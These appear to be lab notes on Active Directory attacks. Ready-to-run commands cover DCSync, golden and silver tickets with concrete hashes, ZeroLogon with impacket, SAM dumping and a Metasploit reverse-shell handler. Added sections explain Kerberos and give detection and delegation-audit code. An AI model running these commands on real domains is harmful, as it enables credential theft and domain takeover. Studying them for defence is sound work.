Domain host enumeration: run windows/gather/enum_ad_computers
Process migration: migrate <pid of winlogon.exe>
lsadump::dcsync /domain:ack123.com /user:krbtgt
Get the SID and hash:
lsadump::lsa /patch
Golden ticket
#kerberos::golden /user:<domain admin username to impersonate> /domain:demo.com /sid:<domain SID> /krbtgt:<hash of the krbtgt user> /ticket:ticket.kirbi
kerberos::golden /user:16SERVER-DC1 /domain:ACK123.com /sid:S-1-5-21-2015848930-1301831522-615504165-1602 /krbtgt:fb979da43f63a991f8f5599add59e01c /ticket:ticket.kirbi
kerberos::purge // first purge all existing tickets
kerberos::ptt ticket.kirbi // then inject the generated ticket on the domain user's host
--------------------------------------------------------------------------------------------
Silver ticket
/domain: domain name; /sid: domain SID; /service: service type; /ticket (optional): path to save the ticket; /ptt: inject directly into memory; /rc4: NTLM hash of the DC machine account
kerberos::golden /user:test /domain:main.com /sid:S-1-5-21-2214894582-1205818508-3793940241 /target:dc.main.com /rc4:e72477885554476fbc116b63a21f36e2 /service:host /ptt
Create a scheduled task:
schtasks /create /S dc.main.com /tn "task1" /RU "system" /sc weekly /tr "c:\windows\system32\calc.exe"
With the cleartext password of a service account configured for unconstrained delegation, domain administrator privileges can be obtained as follows.
Obtain a ticket (TGT) for the service account:
tgt::ask /user:12server-data2 /domain:ack123.com /password:QWEasd.1122 /ticket:data2.kirbi
Use the forged ticket to request from the DC a TGS granting administrator access to the domain server's CIFS service:
tgs::s4u /tgt:data2.kirbi /user:administrator@ack123.com /service:service_to_access
Diamond ticket
Similar to a golden ticket, but stealthier and more powerful. A diamond ticket lets an attacker forge service tickets (TGS).
Characteristics: no need to forge a TGT and no interaction with the DC; can be forged for a specific service, so the impact is narrower; full control over that specific service.
Prerequisites:
1. domain administrator privileges;
2. the Kerberos service ticket key --> lsadump::dcsync /user:krbtgt
3. clear the target service's SPN (Service Principal Name).
Sapphire ticket
ADCS relay within the domain
ZeroLogon (CVE-2020-1472)
---------------------------------------------------------------------------
msfconsole -qx "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.65.208; set LPORT 4444; run"
How golden tickets work
The user requests the authentication service, and a TGT is generated from the username and password.
The TGT is signed and encrypted by the domain controller's KRBTGT account; with the TGT the user asks the "ticket granting service" for a "service ticket" and thereby accesses resources in the domain.
Attack method
Prerequisite: administrator (or higher) privileges on the domain controller
First obtain the hash of the krbtgt account
Then manually generate a TGT and impersonate any user to access resources in the domain, including the DC.
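Added example (not from the original notes): detection logic for two properties of a forged TGT that follow from the description above, namely that it never went through KRB_AS_REQ and that one built from the krbtgt NTLM hash (as with the /krbtgt: hash in the command above) uses RC4. It runs over constructed records shaped like DC security events 4768 and 4769; field names follow the Windows event XML, while the event values and the AES-only domain policy are assumptions.

```python
ETYPE_RC4, ETYPE_AES256 = "0x17", "0x12"   # TicketEncryptionType values seen in 4768/4769

def golden_ticket_indicators(events: list, domain_etype: str = ETYPE_AES256) -> list:
    # Accounts (with source IP) that obtained a TGT from this DC through a normal
    # AS exchange, i.e. that have a 4768 event.
    issued = {(e["TargetUserName"].split("@")[0].lower(), e["IpAddress"])
              for e in events if e["EventID"] == 4768}
    alerts = []
    for e in events:
        if e["EventID"] != 4769:
            continue
        who, src = e["TargetUserName"].split("@")[0].lower(), e["IpAddress"]
        # 1) Tickets forged from the krbtgt NTLM hash use RC4. Where the domain's accounts
        #    negotiate AES, a 4769 showing RC4 is a commonly used review signal (legacy
        #    service accounts are the usual benign cause).
        if e["TicketEncryptionType"] == ETYPE_RC4 and domain_etype != ETYPE_RC4:
            alerts.append((who, src, e["ServiceName"], "rc4-ticket-in-aes-domain"))
        # 2) A forged TGT never went through KRB_AS_REQ, so no 4768 precedes the 4769.
        #    Caveat: another DC may have issued the TGT; correlate 4768s from all DCs.
        if (who, src) not in issued:
            alerts.append((who, src, e["ServiceName"], "tgs-without-prior-tgt"))
    return alerts

# Constructed sample: alice authenticates normally; svc-backup presents a TGT this DC
# never issued, and the resulting service ticket is RC4.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "alice", "IpAddress": "10.0.0.21",
     "ServiceName": "krbtgt", "TicketEncryptionType": ETYPE_AES256},
    {"EventID": 4769, "TargetUserName": "alice@EXAMPLE.LOCAL", "IpAddress": "10.0.0.21",
     "ServiceName": "cifs/files.example.local", "TicketEncryptionType": ETYPE_AES256},
    {"EventID": 4769, "TargetUserName": "svc-backup@EXAMPLE.LOCAL", "IpAddress": "10.0.0.99",
     "ServiceName": "cifs/dc01.example.local", "TicketEncryptionType": ETYPE_RC4},
]

if __name__ == "__main__":
    for alert in golden_ticket_indicators(SAMPLE_EVENTS):
        print(alert)
```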
Lateral movement in the domain
pass the hash
Obtain passwords from SYSVOL group policy
cve-2019-1040
MS14-068
CVE-2020-1472 exploit process
Set the password to empty:
proxychains python cve-2020-1472-exploit.py 16server-dc1 10.10.10.135
Dump hashes:
proxychains impacket-secretsdump ack123.com/16server-dc1\$@10.10.10.135 -no-pass
WMI connection:
proxychains impacket-wmiexec aad3b435b51404eeaad3b435b51404ee:bc23a1506bd3c8d3a533680c516bab27 ack123.com/administrator@10.10.10.135
Restore the original hash:
Export the SAM:
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
lget system.save
lget sam.save
lget security.save
proxychains impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL
proxychains python restorepassword.py 16server-dc1@16server-dc1 -target-ip 10.10.10.135 -hexpass 229625211ee8ef3ba31427eb53e97db75801ef2751d945cf050fe3282eb49d8a294f4b370ab30549b3b574286e6595ce305496751888660ba990b2b1963a01b04c88df5913df5f882eaeac5bf8e142489c24088cc32604f35361ba55304e9edd3cf9a9203bd1e48a131cb3cb07a02863e62db1ceac50416a794839e84634f703ba6961e6bf47e893fe0a28ffe68574529ade4a7dfe9bbdf3f7fff8638adf7836fd85b391a8a25ee33f00ab3cc369071bcbb93eba3f9dc97646b110a83a81867537bee814ae33875b6c3bc002f5202066a50129a0771013ff83d7615312b2d3b3b74be3e07ef6f998faedeba2d4c24ed6
CVE-2021-1675/CVE-2021-34527 PrintNightmare
How does Kerberos work
Kerberos is an authentication protocol; it validates which resources or services a given user can access.
Kerberos components:
Transport layer: uses UDP or TCP as the transport protocol, which sends data in cleartext; Kerberos itself is responsible for providing encryption.
Agents: several agents work together to provide authentication in Kerberos:
Client or user: who wants to access the services
AP (Application Server): offers the service required by the user
KDC (Key Distribution Center): the main service of Kerberos, responsible for issuing tickets; installed on the DC (Domain Controller). It is supported by the AS (Authentication Service), which issues the TGTs.
Tickets
TGS (Ticket Granting Service): encrypted with the service key.
TGT (Ticket Granting Ticket): presented to the KDC to request TGSs. It is encrypted with the KDC key.
Authentication process
KRB_AS_REQ: the request sent to obtain a TGT from the KDC. KRB_AS_REQ has the following fields:
A timestamp encrypted with the client key
username
The service SPN associated with the krbtgt account
A nonce generated by the user
KRB_AS_REP: after receiving the KRB_AS_REQ, the KDC verifies the user's identity by decrypting the timestamp. If the message is correct, it must respond with a KRB_AS_REP.
KRB_AS_REP includes the following information:
username
TGT
Some data encrypted with the user key
KRB_TGS_REQ: in order to request a TGS, a KRB_TGS_REQ message must be sent to the KDC.
KRB_TGS_REQ includes:
data encrypted with the session key:
username,
timestamp
TGT
SPN
nonce generated by the user
KRB_TGS_REP: after receiving the KRB_TGS_REQ message, the KDC returns a TGS in a KRB_TGS_REP.
KRB_TGS_REP includes:
username
TGS:
service session key,
username,
expiration date,
PAC
data encrypted with the session key:
service session key,
expiration date,
nonce
KRB_AP_REQ: if everything went well, the user now holds a valid TGS to interact with the service. To use it, the user must send the AP a KRB_AP_REQ message.
KRB_AP_REQ includes:
TGS
data encrypted with the service session key:
username,
timestamp
After that, if the privileges are right, the user can access the service.
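As an added example (not part of the original notes), the AS, TGS and AP exchanges just listed, and the golden-ticket principle above that the KDC only checks a TGT under the krbtgt key, modelled in Python with an HMAC-based stand-in for Kerberos encryption. Keys, principal names and SPNs are constructed.

```python
import hashlib, hmac, json, os, time

def seal(key: bytes, fields: dict) -> bytes:
    # Stand-in for Kerberos encryption: HMAC tag || JSON body. Only a holder of
    # `key` can produce a blob that open_sealed() accepts (toy, integrity-only).
    body = json.dumps(fields, sort_keys=True).encode()
    return hmac.new(key, body, hashlib.sha256).digest() + body

def open_sealed(key: bytes, blob: bytes) -> dict:
    tag, body = blob[:32], blob[32:]
    if not hmac.compare_digest(tag, hmac.new(key, body, hashlib.sha256).digest()):
        raise ValueError("ticket/authenticator does not verify under this key")
    return json.loads(body)

# Constructed long-term keys: the KDC holds all three, the client only its own, the AP only SERVICE_KEY.
CLIENT_KEY = hashlib.sha256(b"user-password").digest()
KRBTGT_KEY, SERVICE_KEY = os.urandom(32), os.urandom(32)

def kdc_as(req: dict) -> dict:          # KRB_AS_REQ -> KRB_AS_REP
    open_sealed(CLIENT_KEY, req["enc_timestamp"])   # pre-auth: client key proves identity
    session = os.urandom(16).hex()
    tgt = seal(KRBTGT_KEY, {"user": req["user"], "session": session})
    return {"user": req["user"], "tgt": tgt,
            "enc": seal(CLIENT_KEY, {"session": session, "nonce": req["nonce"]})}

def kdc_tgs(req: dict) -> dict:         # KRB_TGS_REQ -> KRB_TGS_REP
    tgt = open_sealed(KRBTGT_KEY, req["tgt"])   # the TGT's only check is the krbtgt key
    auth = open_sealed(bytes.fromhex(tgt["session"]), req["authenticator"])
    if auth["user"] != tgt["user"]:
        raise ValueError("authenticator does not match TGT")
    svc_session = os.urandom(16).hex()
    tgs = seal(SERVICE_KEY, {"user": tgt["user"], "svc_session": svc_session,
                             "spn": req["spn"], "pac": ["Domain Users"]})
    return {"tgs": tgs, "enc": seal(bytes.fromhex(tgt["session"]),
                                    {"svc_session": svc_session, "nonce": req["nonce"]})}

def ap_accept(req: dict):               # KRB_AP_REQ, checked by the AP without asking the KDC
    tgs = open_sealed(SERVICE_KEY, req["tgs"])
    auth = open_sealed(bytes.fromhex(tgs["svc_session"]), req["authenticator"])
    return tgs["user"] if auth["user"] == tgs["user"] else None

def client_session(user: str = "alice", spn: str = "cifs/files.example.local"):
    # Client side of the three exchanges; returns the identity the AP accepted.
    as_rep = kdc_as({"user": user, "nonce": 1, "spn": "krbtgt/EXAMPLE.LOCAL",
                     "enc_timestamp": seal(CLIENT_KEY, {"ts": time.time()})})
    session = bytes.fromhex(open_sealed(CLIENT_KEY, as_rep["enc"])["session"])
    tgs_rep = kdc_tgs({"tgt": as_rep["tgt"], "spn": spn, "nonce": 2,
                       "authenticator": seal(session, {"user": user, "ts": time.time()})})
    svc_session = bytes.fromhex(open_sealed(session, tgs_rep["enc"])["svc_session"])
    return ap_accept({"tgs": tgs_rep["tgs"],
                      "authenticator": seal(svc_session, {"user": user, "ts": time.time()})})
```

Because the AP validates the service ticket with SERVICE_KEY alone, and the KDC validates the TGT with KRBTGT_KEY alone, whoever holds those keys is trusted by that step; rotating the krbtgt key invalidates every TGT sealed under the old one.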
Attacks
Overpass the hash / Pass the key
Pass The Ticket
Golden Ticket / Silver Ticket
How to attack Kerberos
ASREP Roast
Kerberoasting
Pass the key
Pass the ticket
Silver ticket
Golden ticket
For the first attacks only connectivity with the DC is required; the last attack requires the user to be a Domain Administrator.
Delegation
Delegation hands a domain user's privileges to a service account so that the service account can act in the domain with that user's privileges; an attacker can abuse delegation to obtain domain administrator privileges.
1. Unconstrained delegation (Trust this computer for delegation to any service)
This is the least secure form of delegation: it lets a service account access every service in the domain as any other user, without restriction. Once an attacker controls a service account configured for unconstrained delegation, they can impersonate any user, including highly privileged ones, to other services and resources.
Query computer accounts with unconstrained delegation:
AdFind.exe -b "DC=ack123,DC=com" -f "(&(samAccountType=805306369) (userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName
Get-NetComputer -Unconstrained -Domain ack123.com
Query service (user) accounts with unconstrained delegation:
AdFind.exe -b "DC=ack123,DC=com" -f "(&(samAccountType=805306368) (userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName
Get-NetUser -Unconstrained -Domain ack123.com | select name
2. Constrained delegation (Trust this user for delegation to specified services only)
Constrained delegation limits the set of services a service account may access on a user's behalf. Although this is safer than unconstrained delegation, a misconfiguration still lets an attacker abuse the mechanism to impersonate a specific user to the specified services.
3. Resource-based constrained delegation
This is the most fine-grained delegation control in Windows: the resource (such as a server or service) decides who may access it on behalf of other users. An attacker may try to take control of a resource and use this to escalate privileges.
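Added example, not from the original notes: an audit that classifies directory entries into the three delegation types described above, using the same userAccountControl bit (524288) the AdFind filters match plus the msDS-AllowedToDelegateTo and msDS-AllowedToActOnBehalfOfOtherIdentity attributes. The entries and domain name are constructed, and the severity scale is my own.

```python
TRUSTED_FOR_DELEGATION = 0x80000            # 524288: unconstrained, the bit the AdFind filters above test
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
SAM_MACHINE_ACCOUNT = 805306369             # sAMAccountType of computer accounts (user accounts: 805306368)

def delegation_kind(entry: dict) -> str:
    uac = int(entry.get("userAccountControl", 0))
    if uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if entry.get("msDS-AllowedToDelegateTo"):
        return "constrained+transition" if uac & TRUSTED_TO_AUTH_FOR_DELEGATION else "constrained"
    if entry.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        return "rbcd-target"
    return "none"

def audit_delegation(entries: list) -> list:
    # Returns (severity, sAMAccountName, kind, detail), highest severity first. Domain
    # controllers carry TRUSTED_FOR_DELEGATION by default, so they are marked "expected".
    order = {"high": 0, "medium": 1, "low": 2, "info": 3, "expected": 4}
    findings = []
    for e in entries:
        kind = delegation_kind(e)
        if kind == "none":
            continue
        is_dc = "OU=Domain Controllers," in e["distinguishedName"]
        acct = "computer" if e["sAMAccountType"] == SAM_MACHINE_ACCOUNT else "user"
        if kind == "unconstrained":
            sev = "expected" if is_dc else "high"
            detail = "domain controller" if is_dc else f"non-DC {acct} account can impersonate any user to any service"
        elif kind == "constrained+transition":
            sev, detail = "medium", "S4U2Self allowed; targets: " + ",".join(e["msDS-AllowedToDelegateTo"])
        elif kind == "constrained":
            sev, detail = "low", "targets: " + ",".join(e["msDS-AllowedToDelegateTo"])
        else:
            sev, detail = "info", "resource lists principals allowed to act on behalf of other users"
        findings.append((sev, e["sAMAccountName"], kind, detail))
    return sorted(findings, key=lambda f: order[f[0]])

# Constructed directory entries (not from a live DC); names and DNs are placeholders.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "DC01$", "sAMAccountType": 805306369, "userAccountControl": 0x82000,
     "distinguishedName": "CN=DC01,OU=Domain Controllers,DC=example,DC=local"},
    {"sAMAccountName": "WEB01$", "sAMAccountType": 805306369, "userAccountControl": 0x81000,
     "distinguishedName": "CN=WEB01,CN=Computers,DC=example,DC=local"},
    {"sAMAccountName": "svc_sql", "sAMAccountType": 805306368, "userAccountControl": 0x1010200,
     "distinguishedName": "CN=svc_sql,OU=Service Accounts,DC=example,DC=local",
     "msDS-AllowedToDelegateTo": ["cifs/files.example.local"]},
    {"sAMAccountName": "FILES01$", "sAMAccountType": 805306369, "userAccountControl": 0x1000,
     "distinguishedName": "CN=FILES01,CN=Computers,DC=example,DC=local",
     "msDS-AllowedToActOnBehalfOfOtherIdentity": b"<constructed security descriptor>"},
]
```

Feed it the output of an LDAP search over the same attributes (an ldap3 query or the AdFind output above, parsed into dicts) to get the same classification for a real domain.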